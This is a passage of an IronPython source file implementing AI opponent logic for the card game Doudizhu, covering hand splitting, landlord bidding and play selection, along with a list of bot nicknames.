import clr, sys, types clr.AddReference('System') clr.AddReference('ZyGames.Framework.Common'); clr.AddReference('ZyGames.Framework') clr.AddReference('ZyGames.Framework.Game') clr.AddReference('ZyGames.Doudizhu.Model') from ZyGames.Framework.Common.Log import * from System.Collections.Generic import * from ZyGames.Doudizhu.Model import * from ZyGames.Framework.Cache.Generic import * from ZyGames.Framework.Game.Cache import * class CardVector(): """牌储存结构,ex:2:[202,102],3:[203,103]""" def __init__(self, type): """@type:结构类型wang,bomb,shun,three,two,one""" self.__type = type self.__data = {} def addChild(self, vector): key = vector.__type if key: self.__data[key] = vector def len(self): return len(self.__data.keys()) def add(self, key, cards): self.__data[key] = cards def hasKey(self, key): return self.__data.has_key(key) def get(self, key): return self.__data[key] def remove(self, key): del self.__data[key] def clear(self): return self.__data.clear() def getItems(self): return self.__data.items() def getKeys(self): keys = self.__data.keys() keys.sort() return keys def getFirstVal(self): keys = self.getKeys() if len(keys) > 0: return self.get(keys[0]) return None def getLasttVal(self): keys = self.getKeys() if len(keys) > 0: return self.get(keys[len(keys)-1]) return None def getGreaterThan(self, k): """取出大于k的牌->obj或[]""" keys = self.getKeys() for key in keys: if key > k: return self.get(key) return [] def getMaxGreaterThan(self, k): """取出大于k的最大的牌->obj或[]""" keys = self.getKeys() for i in range(len(keys)-1, -1,-1): key = keys[i] if key > k: return self.get(key) return [] def getList(self): list = [] keys = self.getKeys() for key in keys: val = self.get(key) if type(val) == types.ListType: for t in val: list.append(t) else: list.append(val) return list def getIndexVal(self, index): keys = self.getKeys() if len(keys) > index: return self.get(keys[index]) return None class AIConfig(): @staticmethod def getConfig(name): return AIConfig.__config[name] __config = { 
"nickName": ['雪舞№枫红','夜舞&倾城','魅影い冰绝','残恋々ら','匰身ァ饚З','走鐹菂蕗_','无语づ肴','传じ☆ve说','恋☆鵷:鶵','≮梦★羽≯','莞镁主题曲〃','o┢┦apΡy','幽魂邀絮】','So丶滚吧','無話可說。','花╮开一夏','▋潶禮菔▍','倾世恋流年','訫侑所属丶','命里缺沵','柔情似水似','淫大代表','钢茎混凝凸','∫安雅轩 *','查 无 此 人','上帝是个妞','_她入他心','___髅ㄦ〤','三分淑女范','﹋落花伊人','吃货不痴货','〃逢床作戏╮','屌丝先森 ぃ','资格让皒哭','╰︶情兽〤','得瑟的尛孩纸','好小伙中国造','情非得已り','夏兮兮°','等着你来宠','安小夕 ▽','堇色流年丿','如歌亦如梦','墨染锦年╮','独自沉沦 ∞','乱世°妖娆','夏沫"Smile','七分笑三分真','沫尐诺⌒_⌒','___大苹果','德玛→西亚','Oo草丛伦oO','菊★花№信','_提莫必须死','嘉文四阿哥_','轮子┱妈','稻__草人','乌┣┰┝鸦','┣死歌┰┝','爱~。~射','炮-,-娘','oO小萝莉','狗头人Oo','大々‖嘴','大虫子','扇子Oo妈','冰鸟','船长','女剑','女枪','男枪','风女','卡萨丁','阿卡丽','卡特琳娜','伊泽瑞尔','戴安娜','安妮','凯特琳','贾克斯','卡萨丁','拉克丝','易大师','莫甘娜','奈德丽','索拉卡','提莫','潘森','泰达米尔','佛拉基米尔','崔斯塔娜','(=@__@=)哪里','丽桑桌','奎因','扎克','维嘉','墨菲特','索菲娅','阿狸','影流之主'], "head": ['head_1001','head_1002','head_1003','head_1004','head_1005','head_1006','head_1007','head_1008','head_1009','head_1010','head_1011','head_1012','head_1013','head_1014','head_1015','head_1016','head_1017','head_1018','head_1019','head_1020'] } class CardAILogic(): """斗地主AI逻辑""" def __init__(self, roomId, tableId, positionId): self.__table = None self.__pos = None self.__nextPos = None self.__prePos = None self.__playerNum = 3 self.__Landlord = None self.__CK = 13 self.__CA = 14 self.__C2 = 15#2子 self.__CW1 = 18 self.__CW2 = 19 self.__role = 0#处于地主的位置 self.__largestCardSize = self.__CW2 roomStruct = MemoryCacheStruct[RoomData]() key = str(roomId) roomData = None result = roomStruct.TryGet(key) if result[0]: roomData = result[1] resultTable = roomData.Tables.TryGetValue(tableId) if resultTable[0]: self.__table = resultTable[1] self.__playerNum = self.__table.PlayerNum if self.__table and positionId < self.__table.Positions.Length: tempCard = 0 for pos in self.__table.Positions: if pos.IsLandlord: self.__Landlord = pos if pos.Id == positionId: self.__pos = pos #计算最大牌 if pos.CardData and pos.CardData.Count > 0: lastCardVal = pos.CardData[pos.CardData.Count-1] % 100 if lastCardVal > tempCard: tempCard = lastCardVal 
if tempCard > 0: self.__largestCardSize = tempCard if self.__Landlord and self.__pos: index = (self.__pos.Id + 1) % self.__playerNum self.__nextPos = self.__table.Positions[index] preindex = (self.__pos.Id + self.__playerNum - 1) % self.__playerNum self.__prePos = self.__table.Positions[preindex] #计算role处在0:地主,-1:上家,1:下家位置 if self.__Landlord.Id == self.__pos.Id: self.__role = 0 elif self.__Landlord.Id == self.__nextPos.Id: self.__role = -1 else: self.__role = 1 def writeLog(self, msg): #todo test TraceLog.WriteComplement(msg) def getCardSize(self, card): """获取牌大小->int""" return card % 100 def getOutCardData(self): """出牌对象->CardData""" return self.__table.PreCardData def getOutCardResult(self): """获取已出牌记录->List<CardData>""" return self.__table.OutCardList def getUserCard(self): """获取玩家手上的牌->List<int>""" return self.__pos.CardData def getUserRole(self): """玩家角色,0:地主,-1:上家,1:下家位置""" return self.__role def getNextPosCardCount(self): """获取玩家下家牌数->int""" return self.__nextPos.CardData.Count def getPrePosCardCount(self): """获取玩家上家牌数->int""" return self.__prePos.CardData.Count def checkCall(self): """检查能否叫地主->bool""" #火箭为8分,炸弹为6分,大王4分,小王3分,一个2为2分 bigCardValue = 0#大牌权值 cards = self.getUserCard() times = self.__table.MultipleNum / 2 bomCards = [] bombvct = CardVector('bomb') self.getBombCard(cards, bombvct) bomCards.append(bombvct.getList()) wangvct = CardVector('wang') self.getWangBombCard(cards, wangvct) bomCards.append(wangvct.getList()) c2 = CardVector('c2') self.getCard(cards, self.__C2, c2) c2Count = len(c2.getList()) for bom in bomCards: if len(bom) == 4: bigCardValue = bigCardValue + 6 elif len(bom) == 2: bigCardValue = bigCardValue + 8 if len(bomCards) == 0: if wangvct.hasKey(self.__CW2): bigCardValue = bigCardValue + 4 if wangvct.hasKey(self.__CW1): bigCardValue = bigCardValue + 3 if c2Count < 4: bigCardValue = bigCardValue +(c2Count * 2) if(bigCardValue >= 7 and times < 3)\ or (bigCardValue >= 5 and times < 2)\ or (bigCardValue >= 2 and times < 1): return True 
return False def searchOutCard(self): """出牌搜索,牌组0:为空,1:单牌,2:对牌,3:王炸,4:三张,5:三带一,6:三带二,7:炸弹,8:顺子,9:四带二,10:连对,11:飞机,12:飞机带二,13:二连飞机带二对""" resultCards = [] handCard = self.getUserCard() if not handCard or len(handCard) == 0: return resultCards myCardCount = len(handCard) handleTimes = self.getCardHandleTimes(handCard) preOutCard = self.getOutCardData()#当前已的出牌 outCardResult = self.getOutCardResult() role = self.getUserRole() nextPosCardCount = self.getNextPosCardCount() prePosCardCount = self.getPrePosCardCount() nextIsLand = self.__nextPos.IsLandlord landlord = self.__Landlord landlordCardCount = self.__prePos.CardData.Count if not preOutCard or preOutCard.PosId == self.__pos.Id: #任意出牌 outVct = CardVector('') resultCards = self.freeOutCard(handCard) cardCount = len(resultCards) if (role==0 and (nextPosCardCount == 1 or prePosCardCount ==1) and cardCount==1)\ or (role!=0 and nextIsLand and nextPosCardCount == 1 and cardCount==1)\ or (role!=0 and landlord.CardData.Count == 1 and cardCount==1): #不能出比最大牌小的单牌 resultCards = [] self.getTwoCard(handCard, outVct) if outVct.len() > 0: self.copyList(outVct.getFirstVal(), resultCards) else: #最大单牌 cards = self.getLargeSingleCard(handCard, self.__CA) if len(cards) > 0: self.copyList(cards, resultCards) else: self.copyList(handCard[len(handCard)-1], resultCards) elif (role==0 and (nextPosCardCount == 2 or prePosCardCount ==2) and cardCount==2 and myCardCount > 2)\ or (role!=0 and nextIsLand and nextPosCardCount == 2 and cardCount==2 and myCardCount > 2)\ or (role!=0 and landlord.CardData.Count == 2 and cardCount==2 and myCardCount > 2): #不能出小于最大牌的对子 cardval = self.getCardSize(resultCards[0]) if cardval < self.__CA and cardval < self.__largestCardSize: resultCards = [] bombvct = CardVector('') lastCards = self.getBombCard(handCard, bombvct) if myCardCount < 6 and bombvct.len() > 0: self.copyList(bombvct.getFirstVal(), resultCards) self.getSingleCard(lastCards, outVct) if outVct.len() > 0: self.copyList(outVct.getFirstVal(), 
resultCards) else: resultCards.append(handCard[0]) elif role!=0 and nextIsLand==False and handleTimes > 3 and nextPosCardCount == 1: #自己手上大于6张,且同家剩1张时出单牌 resultCards = [] resultCards.append(handCard[0]) elif role!=0 and nextIsLand==False and handleTimes > 3 and nextPosCardCount == 2 and self.__pos.OutTwoTimes == 0: #自己手上大于6张,且同家剩2张配合对家出对次数为0时出对子 self.getTwoCard(handCard, outVct) if outVct.len() > 0: resultCards = [] self.__pos.OutTwoTimes = self.__pos.OutTwoTimes + 1 self.copyList(outVct.getFirstVal(), resultCards) else: pass #self.writeLog('%s:%s' % ('任意出牌' ,resultCards)) elif preOutCard.Type == 3: #王炸 return resultCards else: outcardType = preOutCard.Type islandlordOut = preOutCard.PosId == landlord.Id if role == 0: #地主压牌 if handleTimes < 3 or (nextPosCardCount == 2 and outcardType == DeckType.Double)\ or (nextPosCardCount == 1 and outcardType == DeckType.Single): #压牌 resultCards = self.enforceOutCard(preOutCard, handCard) elif nextPosCardCount < 7 or prePosCardCount < 7: #压牌不打炸 resultCards = self.enforceOutCard(preOutCard, handCard, True) else: #跟牌 resultCards = self.followOutCard(preOutCard, handCard) elif role < 0: #地主上家出牌 #a)当自己只差2手时压牌,或者地主小于3张且出对时压牌;或者地主小于6张并且打单或对且对家不是最大牌时压牌 #b)农民同家出牌大于等于A时不跟 if handleTimes < 3 or\ (landlordCardCount <= 2 and outcardType == DeckType.Double and (islandlordOut or preOutCard.CardSize < self.__largestCardSize)) or\ (landlordCardCount == 1 and outcardType == DeckType.Single and (islandlordOut or preOutCard.CardSize < self.__largestCardSize)) or\ landlordCardCount <= 2: #压牌 resultCards = self.enforceOutCard(preOutCard, handCard) elif (landlordCardCount < 7 and islandlordOut and (outcardType == DeckType.Double or outcardType == DeckType.Single) ): #压牌不打炸 resultCards = self.enforceOutCard(preOutCard, handCard, True) else: if (not islandlordOut) and (preOutCard.CardSize >= self.__CA \ or (outcardType >= DeckType.Double and preOutCard.CardSize >= self.__CK)\ or outcardType == DeckType.Single and preOutCard.CardSize > self.__C2): #不跟 
return resultCards #跟牌 resultCards = self.followOutCard(preOutCard, handCard) else: #地主下家出牌,当地主小于3张 if handleTimes < 3 or (islandlordOut and landlordCardCount <= 2): #压牌 resultCards = self.enforceOutCard(preOutCard, handCard) elif (landlordCardCount <= 2 and outcardType == DeckType.Double and (islandlordOut or preOutCard.CardSize < self.__largestCardSize)) or\ (landlordCardCount == 1 and outcardType == DeckType.Single and (islandlordOut or preOutCard.CardSize < self.__largestCardSize)): #压牌不打炸 resultCards = self.enforceOutCard(preOutCard, handCard, True) else: if (not islandlordOut) and (preOutCard.CardSize >= self.__CA \ or (outcardType >= DeckType.Double and preOutCard.CardSize >= self.__CK)\ or outcardType == DeckType.Single and preOutCard.CardSize > self.__C2): #不跟 return resultCards #跟牌 resultCards = self.followOutCard(preOutCard, handCard) return resultCards def copyList(self, list, clist, index=0, count=0): """@list: copy源,\n@clist: copy目标\@index:开始位置\n@count:数量""" if type(list) == types.ListType: i = 0 for val in list: if count > 0 and len(clist) == count: break if i >= index: clist.append(val) i = i+1 elif list: clist.append(list) def getLargeSingleCard(self, handCard, minval): """单牌倒打->[]""" result = [] #先打2 verctor = CardVector('') handTime = self.getCardHandleTimes(handCard) self.getCard(handCard, self.__C2, verctor) if handTime > 3 and verctor.len() > 0 and minval < self.__C2: result.append(verctor.getFirstVal()) else: verctor = CardVector('') wangvct = CardVector('') bombvct = CardVector('') #排除炸 lastCards = self.getBombCard(handCard, bombvct) lastCards = self.getWangBombCard(lastCards, wangvct) self.convertVerctor(lastCards, verctor) if verctor.len() > 0: tempCard = verctor.getMaxGreaterThan(minval) if tempCard: self.copyList(tempCard, result) return result #self.copyList(bombvct.getFirstVal(), result) #if len(result) == 0: # self.copyList(wangvct.getList(), result) return result def freeOutCard(self, handCard): """自由出牌,先飞机,连对,顺子,三张,对子,单牌->[]""" 
vector = self.splitCard(handCard) val = 0 resultCards = [] #判断剩余2手牌时是否是有炸或王炸 handTimes = self.getVectorHandleTimes(vector) if handTimes < 3: #王炸 resultCards = self.outWangBombCard(handCard) if len(resultCards) == 0: #取炸 resultCards = self.outBombCard(handCard) if len(resultCards) == 0: #先出最大的对或单 vectorMax = CardVector('Max') self.getCard(handCard, self.__largestCardSize, vectorMax) if vectorMax.len() > 0: if vector.get('two').hasKey(self.__largestCardSize): self.copyList(vector.get('two').get(self.__largestCardSize), resultCards) if len(resultCards) == 0 and vector.get('one').hasKey(self.__largestCardSize): self.copyList(vector.get('one').get(self.__largestCardSize), resultCards) if len(resultCards) > 0: return resultCards resultCards = self.processOutCard(vector, DeckType.FlyAndTwo, val, 8) if len(resultCards) > 0: return resultCards resultCards = self.processOutCard(vector, DeckType.FlyAndTwoDouble, val, 10) if len(resultCards) > 0: return resultCards resultCards = self.processOutCard(vector, DeckType.Fly, val, 6) if len(resultCards) > 0: return resultCards resultCards = self.processOutCard(vector, DeckType.Liandui, val, 6) if len(resultCards) > 0: return resultCards resultCards = self.processOutCard(vector, DeckType.Shunzi, val, 5) if len(resultCards) > 0: return resultCards #三张是A以上的牌时,先出其它类型牌 c2Cards = [] resultCards = self.processOutCard(vector, DeckType.ThreeAndOne, val, 3) if len(resultCards) > 0: if handTimes > 2 and self.getCardSize(resultCards[0]) >= self.__CA: c2Cards = resultCards resultCards = [] else: return resultCards if len(c2Cards) == 0: resultCards = self.processOutCard(vector, DeckType.ThreeAndTwo, val, 3) if len(resultCards) > 0: return resultCards resultCards = self.processOutCard(vector, DeckType.Three, val, 3) if len(resultCards) > 0: return resultCards resultCards = [] #只差一对 if len(handCard) == 2: resultCards = self.processOutCard(vector, DeckType.Double, val, 2) if len(resultCards) > 0: return resultCards #是否有四带2 bombCards = 
self.processOutCard(vector, DeckType.Bomb, val, 4) if handTimes < 5 and len(bombCards) > 0: resultCards = [] self.copyList(bombCards, resultCards) oneCount = self.getSingleCount(vector) twoCount = self.getTwoCount(vector) if oneCount > 1: self.copyList(vector.get('one').getIndexVal(0), resultCards) self.copyList(vector.get('one').getIndexVal(1), resultCards) return resultCards elif twoCount == 1 and oneCount ==1: onetemp = vector.get('one').getFirstVal() twotemp = vector.get('two').getFirstVal() if self.getCardSize(onetemp) > self.getCardSize(twotemp[0]): self.copyList(twotemp, resultCards) return resultCards else: self.copyList(onetemp, resultCards) self.copyList(twotemp[0], resultCards) return resultCards elif twoCount > 0: self.copyList(vector.get('two').getList(), resultCards) return resultCards else: resultCards = [] #是否出对或单 singleCards = self.processOutCard(vector, DeckType.Single, val, 1) twoCards = self.processOutCard(vector, DeckType.Double, val, 2) if len(twoCards) > 0 and len(singleCards) > 0\ and self.getCardSize(singleCards[0]) > self.getCardSize(twoCards[0]): return twoCards elif len(singleCards) > 0: return singleCards elif len(twoCards) > 0: return twoCards resultCards = self.processOutCard(vector, DeckType.Bomb, val, 4) if len(resultCards) > 0: return resultCards if len(c2Cards) == 0: resultCards = c2Cards return resultCards def followOutCard(self, preOutCard, handCard): """跟对方的出牌,不出对2或3张2->[]""" type = preOutCard.Type val = preOutCard.CardSize count = preOutCard.Cards.Length vector = self.splitCard(handCard) resultCards = self.processOutCard(vector, type, val, count, 0) if len(resultCards) > 1: if type != DeckType.Single\ and self.getCardSize(resultCards[0]) == self.__C2: resultCards = []#不出 return resultCards def processOutCard(self, vector, type, minval, mincount, maxcount=20): """处理牌组出牌规则->[]\n@vector:vector对象集合,@type:出牌类型,\n@minval:,\n@mincount:,\n@maxcount:为0时压牌,否则任意出""" resultCards = [] cards = [] if type == DeckType.Single: cards = 
self.getMoreThanCardVal(vector.get('one'), minval, mincount) if len(cards) > 0: resultCards.append(cards[0]) elif type == DeckType.Double: cards = self.getMoreThanCardVal(vector.get('two'), minval, mincount/2) if len(cards) > 0: self.copyList(cards, resultCards) elif type == DeckType.WangBomb: return resultCards elif type == DeckType.Three: cards = self.getMoreThanCardVal(vector.get('three'), minval, mincount/3) if len(cards) > 0: self.copyList(cards, resultCards) elif type == DeckType.ThreeAndOne: cards = self.getMoreThanCardVal(vector.get('three'), minval, mincount/3) onevct = vector.get('one') if len(cards) > 0 and onevct.len() > 0: self.copyList(cards, resultCards) resultCards.append(onevct.getFirstVal()) elif type == DeckType.ThreeAndTwo: cards = self.getMoreThanCardVal(vector.get('three'), minval, mincount/3) twovct = vector.get('two') if len(cards) > 0 and twovct.len() > 0: self.copyList(cards, resultCards) self.copyList(twovct.getFirstVal(), resultCards) elif type == DeckType.Bomb: cards = self.getMoreThanCardVal(vector.get('bomb'), minval, mincount/4) if len(cards) > 0: self.copyList(cards, resultCards) elif type == DeckType.Shunzi: shunvct = vector.get('shun') keys = shunvct.getKeys() for key in keys: cards = shunvct.get(key) resultCards = self.getMoreThanShunCard(cards, minval, mincount, maxcount) if len(resultCards) > 0: break elif type == DeckType.FourAndTwo: cards = self.getMoreThanCardVal(vector.get('bomb'), minval, mincount/4) onevct = vector.get('one') twovct = vector.get('two') if len(cards) > 0 and (onevct.len() > 1 or twovct.len() > 0): self.copyList(cards, resultCards) if onevct.len() > 1: self.copyList(onevct.getIndexVal(0), resultCards) self.copyList(onevct.getIndexVal(1), resultCards) else: for i in range(0,2): self.copyList(twovct.getIndexVal(i), resultCards) elif type == DeckType.Liandui: twovct = vector.get('two') resultCards = self.getMoreThanCardVal(twovct, minval, mincount/2, maxcount) elif type == DeckType.Fly\ or type == 
DeckType.FlyAndTwo\ or type == DeckType.FlyAndTwoDouble: #处理飞机 threevct = vector.get('three') if threevct.len() > 1: mcount = 0 attrVector = None if type == DeckType.FlyAndTwo: attrVector = vector.get('one') mcount = mincount / (3+1) elif type == DeckType.FlyAndTwoDouble: attrVector = vector.get('two') mcount = mincount / (3+2) else: mcount = mincount / 3 if mcount > 1: threeCards = self.getMoreThanCardVal(threevct, minval, mcount, maxcount) if len(threeCards) > 0 and attrVector and attrVector.len() >= mcount: attrcount = 0 tempArr = [] attrkeys = attrVector.getKeys() for key in attrkeys: if attrcount == mcount: break self.copyList(attrVector.get(key),tempArr) attrcount = attrcount + 1 if (maxcount==0 and attrcount == mcount) or ((maxcount>0 and attrcount >= mcount)): self.copyList(threeCards, resultCards) self.copyList(tempArr, resultCards) else: pass return resultCards def enforceOutCard(self, preOutCard, handCard, ignoreBomb=False): """压对方的牌->list\n@ignoreBomb:是否排除炸""" resultCards = [] type = preOutCard.Type minval = preOutCard.CardSize cardCount = preOutCard.Cards.Length return self.processEnforceOutCard(handCard, type, minval, cardCount, ignoreBomb) def processEnforceOutCard(self, handCard, type, minval, cardCount, ignoreBomb): """处理压对方的牌->list""" resultCards = [] vector = CardVector('') #判断剩余牌是否是炸或王炸 handTimes = self.getCardHandleTimes(handCard) if handTimes < 3: #取炸 resultCards = self.outBombCard(handCard) if len(resultCards) == 0: #王炸 resultCards = self.outWangBombCard(handCard) if len(resultCards) > 0: return resultCards if type == DeckType.Single: #最大单牌 self.copyList(self.getLargeSingleCard(handCard, minval),resultCards) elif type == DeckType.Double: self.getTwoCard(handCard, vector) if vector.len()>0: self.copyList(vector.getGreaterThan(minval),resultCards) else: self.getTwoCard(handCard, vector, True) if vector.len()>0: self.copyList(vector.getGreaterThan(minval),resultCards) elif type == DeckType.WangBomb: return resultCards elif type == 
DeckType.Three: self.getThreeCard(handCard, vector) if vector.len()>0: self.copyList(vector.getGreaterThan(minval),resultCards) elif type == DeckType.ThreeAndOne: lessCards = self.getThreeCard(handCard, vector) if vector.len()>0: vct = CardVector('') self.getSingleCard(lessCards, vct) threearr = vector.getGreaterThan(minval) if vct.len() > 0 and threearr and len(threearr) > 0: self.copyList(threearr, resultCards) resultCards.append(vct.getFirstVal()) elif type == DeckType.ThreeAndTwo: lessCards = self.getThreeCard(handCard, vector) if vector.len()>0: vct = CardVector('') self.getTwoCard(lessCards, vct) threearr = vector.getGreaterThan(minval) if vct.len() > 0 and threearr and len(threearr) > 0: self.copyList(threearr,resultCards) self.copyList(vct.getFirstVal(),resultCards) elif type == DeckType.Bomb: pass elif type == DeckType.Shunzi: lessCards = self.getShunCard(handCard, vector) if vector.len()>0: resultCards = self.getMoreThanShunCard(vector.getFirstVal(), minval, cardCount) elif type == DeckType.FourAndTwo: lessCards = self.getBombCard(handCard, vector) tempcard = vector.getGreaterThan(minval) if tempcard: onevct = CardVector('') twovct = CardVector('') lessCards = self.getSingleCard(lessCards, onevct) lessCards = self.getTwoCard(lessCards, twovct) if (onevct.len() > 1 or twovct.len() > 0): self.copyList(tempcard, resultCards) if onevct.len() > 1: self.copyList(onevct.getIndexVal(0), resultCards) self.copyList(onevct.getIndexVal(1), resultCards) else: for i in range(0,2): self.copyList(twovct.getIndexVal(i), resultCards) elif type == DeckType.Liandui: self.getTwoCard(handCard, vector) cnum = cardCount / 2 if vector.len() >= cnum: resultCards = self.getMoreThanCardVal(vector, minval, cnum) pass elif type == DeckType.Fly\ or type == DeckType.FlyAndTwo\ or type == DeckType.FlyAndTwoDouble: #处理飞机 lessCards = self.getThreeCard(handCard, vector) threevct = vector if threevct.len() > 1: mcount = 0 attrVector = None if type == DeckType.FlyAndTwo: attrVector = 
CardVector('') self.getSingleCard(lessCards, attrVector) mcount = mincount / (3+1) elif type == DeckType.FlyAndTwoDouble: attrVector = CardVector('') self.getTwoCard(lessCards, attrVector) mcount = mincount / (3+2) else: mcount = mincount / 3 if mcount > 1: threeCards = self.getMoreThanCardVal(threevct, minval, mcount, maxcount) if len(threeCards) > 0 and attrVector and attrVector.len() >= mcount: attrcount = 0 tempArr = [] attrkeys = attrVector.getKeys() for key in attrkeys: if attrcount == mcount: break self.copyList(attrVector.get(key),tempArr) attrcount = attrcount + 1 if (maxcount==0 and attrcount == mcount) or ((maxcount>0 and attrcount >= mcount)): self.copyList(threeCards, resultCards) self.copyList(tempArr, resultCards) else: pass if ignoreBomb: if len(resultCards) == 0: #取炸 resultCards = self.outBombCard(handCard) if len(resultCards) == 0: #王炸 resultCards = self.outWangBombCard(handCard) return resultCards def outBombCard(self, handCard): bombvct = CardVector('bomb') self.getBombCard(handCard, bombvct) if bombvct.len() > 0: return bombvct.getFirstVal() return [] def outWangBombCard(self, handCard): wangvct = CardVector('wang') self.getWangBombCard(handCard, wangvct) if wangvct.len() == 2: return wangvct.getList() return [] #以下是拆牌算法 def splitCard(self, handCard): """拆牌->CardVector""" vector = CardVector('all') vector.addChild(CardVector('wang')) vector.addChild(CardVector('bomb')) vector.addChild(CardVector('shun')) vector.addChild(CardVector('three')) vector.addChild(CardVector('two')) vector.addChild(CardVector('one')) lastCards = [] if len(handCard) == 2: if handCard[0] == self.__CW1 and handCard[1] == self.__CW2: vector.get('wang').add(val, handCard[0]) vector.get('wang').add(val, handCard[1]) if len(handCard) > 1: lastCards = self.getUnrelatedCard(handCard, vector) #剩余关联牌 lastCards = self.getBombCard(lastCards, vector.get('bomb')) #检查飞机 lastCards = self.getFlyCard(lastCards, vector.get('three')) lastCards = self.getShunTwoCard(lastCards, 
vector.get('two')) lastCards = self.getShunCard(lastCards, vector.get('shun')) lastCards = self.getThreeCard(lastCards, vector.get('three')) lastCards = self.getTwoCard(lastCards, vector.get('two')) lastCards = self.checkSingleAsShun(lastCards, vector.get('shun')) else: lastCards = handCard lastCards = self.getSingleCard(lastCards, vector.get('one')) return vector def addVector(self, vector, val, list): """增加到vector集合以wang,bomb,three,two,one分类->void""" l = len(list) if l > 0 and val >= self.__CW1: vector.get('wang').add(val, list[0]) elif l == 4: vector.get('bomb').add(val, list) elif l == 3: vector.get('three').add(val, list) elif l == 2: vector.get('two').add(val, list) elif l == 1: vector.get('one').add(val, list[0]) def getUnrelatedCard(self, handCard, vector): """取出无关联的牌,返回剩余关联牌\n@vector:是wang,bomb,shun等的集合->[]""" arr = [] lastCards = [] eqVal = 0 count = len(handCard) if count < 2: return handCard for i in range(0, count): card = handCard[i] val = self.getCardSize(card) if i == 0: arr.append(card) continue precard = handCard[i-1] preval = self.getCardSize(precard) if val == preval: arr.append(card) else: #之间是否有联系 if preval >= self.__C2 or ((eqVal==0 or eqVal != preval-1) and (val==self.__C2 or preval < val-1)): self.addVector(vector, preval, arr) else: self.copyList(arr, lastCards) arr=[] eqVal = preval arr.append(card) #结尾 if i == count-1: if val >= self.__C2 or eqVal < val-1: if (val == self.__CW1 or (preval < self.__CW1 and val == self.__CW2)): #单张大小王 vector.get('one').add(val, card) else: self.addVector(vector, val, arr) else: self.copyList(arr, lastCards) return lastCards #以下是取牌组逻辑 def getShunCard(self, handCard, vector): """取出顺子,返回剩余牌->[]""" lastCards = [] count = len(handCard) if count < 2: return handCard arr = [] arrignore = [] arrlog = [] for i in range(0, count): card = handCard[i] if i == 0: arr.append(card) arrlog.append(card) continue precard = handCard[i-1] preval = self.getCardSize(precard) val = self.getCardSize(card) if preval == val-1 and 
val < self.__C2: arr.append(card) arrlog.append(card) elif preval == val: arrignore.append(card) arrlog.append(card) else: if len(arr) >= 5: vector.add(self.getCardSize(arr[0]), arr) self.copyList(arrignore, lastCards) else: self.copyList(arrlog, lastCards) arr = [] arr.append(card) arrlog = [] arrlog.append(card) arrignore = [] if i == count-1: if len(arr) >= 5: vector.add(self.getCardSize(arr[0]), arr) self.copyList(arrignore, lastCards) arrignore = [] else: self.copyList(arrlog, lastCards) return lastCards def getMoreThanShunCard(self, cards, minval, mincount, maxcount=0): """从顺子cards对象中获取顺子大于minval的牌->[]\n@cards:手上的牌,\n@minval:最小牌面,\n@mincount:顺子个数,\n@maxcount:0时固定匹配""" result = [] length = len(result) for card in cards: val = self.getCardSize(card) if val > minval and val < self.__C2\ and ((maxcount==0 and length < mincount)\ or(maxcount > 0 and length < maxcount-1)): result.append(card) if (maxcount == 0 and len(result) == mincount)\ or(maxcount > 0 and len(result) >= mincount) : return result return [] def getWangBombCard(self, handCard, vector): """取出王炸牌至vector对象,返回剩余牌->[]""" arr = [] temp = [] count = len(handCard) for i in range(0, count): card = handCard[i] val = self.getCardSize(card) if val == self.__CW1 or val == self.__CW2: temp.append(card) else: arr.append(card) if len(temp) == 2: for card in temp: vector.add(self.getCardSize(card), card) else: self.copyList(temp, arr) return arr def getBombCard(self, handCard, vector): """取出炸至vector对象,返回剩余牌->[]""" return self.getSameCard(handCard, 4, vector) def getFlyCard(self, handCard, vector): """取出飞机至vector对象,返回剩余牌->[]""" if len(handCard) > 5: threevct = CardVector('') self.getThreeCard(handCard, threevct) if threevct.len() > 1: arr = self.getMoreThanCardVal(threevct, 0, 2, 20) self.getSameCard(arr, 3, vector) for card in arr: handCard.remove(card) return handCard; def getShunTwoCard(self, handCard, vector): """取出大于3连对至vector对象,返回剩余牌->[]""" if len(handCard) > 6: twovct = CardVector('') 
self.getTwoCard(handCard, twovct) if twovct.len() > 3: arr = self.getMoreThanCardVal(twovct, 0, 4, 20) self.getSameCard(arr, 2, vector) for card in arr: handCard.remove(card) return handCard; def getThreeCard(self, handCard, vector): """取出3条至vector对象,返回剩余牌->[]""" return self.getSameCard(handCard, 3, vector) def getTwoCard(self, handCard, vector, matchThree=False): """取出对子至vector对象,返回剩余牌->[]\n@matchThree:是否匹配三张""" lastCards = self.getSameCard(handCard, 2, vector) if matchThree: threevct = CardVector('') lastCards = self.getSameCard(handCard, 3, threevct) if threevct.len() > 0: keys = threevct.getKeys() for key in keys: val = threevct.get(key) arr = [] self.copyList(val, arr, 0, 2) vector.add(key, arr) return lastCards def getMoreThanCardVal(self, vector, minval, mincount, maxcount=0): """从vector对象取出大于minval的连续牌列表->[]\n@vector:vector对象,\n@minval:牌面值,\n@mincount:匹配个数,\n@maxcount:0时固定匹配""" arr = [] resultCards = [] keys = vector.getKeys() for i in range(0, len(keys)): key = keys[i] if i == 0 and key > minval and key < self.__C2: arr.append(key) elif key > minval: prekey = keys[i-1] if prekey == key-1 and key < self.__C2: arr.append(key) if maxcount==0 and len(arr) == mincount: break else: if len(arr) >= mincount: break else: arr = [] arr.append(key) length = len(arr) if length >= mincount: for i in range(0, length): if (maxcount==0 and i == mincount) or (maxcount > 0 and i >= maxcount-1): break val = arr[i] self.copyList(vector.get(val), resultCards) return resultCards def checkSingleAsShun(self, handCard, vector): """检查单牌是否可加到顺子中,返回剩余牌->[]""" shunvct = vector keys = shunvct.getKeys() if len(keys) == 0: return handCard; lastCards = [] for card in handCard: suc = False for key in keys: items = shunvct.get(key) if len(items) == 0: continue min = self.getCardSize(items[0]) max = self.getCardSize(items[len(items)-1]) val = self.getCardSize(card) if val == min-1: items.insert(0, val) suc = True break elif val == max+1: items.append(val) suc = True break if not suc: 
